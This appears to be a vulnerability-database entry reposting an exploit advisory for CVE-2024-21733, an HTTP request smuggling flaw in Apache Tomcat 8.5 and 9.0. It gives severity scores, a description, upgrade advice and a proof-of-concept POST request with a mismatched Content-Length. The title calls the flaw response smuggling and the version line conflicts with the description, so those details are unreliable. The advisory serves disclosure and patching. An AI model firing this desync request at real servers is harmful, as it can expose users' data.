Apache Tomcat 8.5.63 / 9.0.43 HTTP Response Smuggling

2024-02-0100:00:00

xer0dayz, sn1persecurity.com

packetstormsecurity.com

apache tomcat

http response smuggling

cve-2024-21733

security advisory

upgrade

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

7.4 High

AI Score

Confidence

Low

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.003 Low

EPSS

Percentile

63.3%

JSON

`# Exploit Title: CVE-2024-21733 Apache Tomcat HTTP Request Smuggling  
# Date: 1/31/2024  
# Exploit Author: xer0dayz  
# Vendor Homepage: https://tomcat.apache.org/  
# Software Link: https://tomcat.apache.org/  
# Version: 8.5.7 to 8.5.63 or 9.0.44 or later  
# CVE : CVE-2024-21733  
  
## Description:  
Apache Tomcat from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43 are vulnerable to client-side de-sync attacks.  
  
Client-side de-sync (CSD) vulnerabilities occur when a web server fails to correctly process the Content-Length of POST requests. By exploiting this behavior, an attacker can force a victim's browser to de-synchronize its connection with the website, causing sensitive data to be smuggled from the server and/or client connections.  
  
## Remediation:  
Users are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue.  
  
## Credit:  
This vulnerability was reported responsibly to the Tomcat security team by xer0dayz from Sn1perSecurity LLC.  
  
## History:  
2024-01-19 Original advisory  
  
## Full Security Advisory: https://lists.apache.org/thread/h9bjqdd0odj6lhs2o96qgowcc6hb0cfz  
  
## Full Write-Up: https://sn1persecurity.com/wordpress/cve-2024-21733-apache-tomcat-http-request-smuggling/  
  
## PoC/Exploit:  
  
POST / HTTP/1.1  
Host: hostname  
Sec-Ch-Ua: "Chromium";v="119", "Not?A_Brand";v="24"  
Sec-Ch-Ua-Mobile: ?0  
Sec-Ch-Ua-Platform: "Linux"  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: none  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Priority: u=0, i  
Connection: keep-alive  
Content-Length: 6  
Content-Type: application/x-www-form-urlencoded  
X  
  
Sent with [Proton Mail](https://proton.me/) secure email.  
`